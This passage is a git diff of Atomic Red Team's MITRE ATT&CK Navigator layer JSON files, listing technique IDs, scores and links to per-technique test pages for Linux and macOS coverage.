T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index 6f85cc98..cd230671 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1140","score":100,"e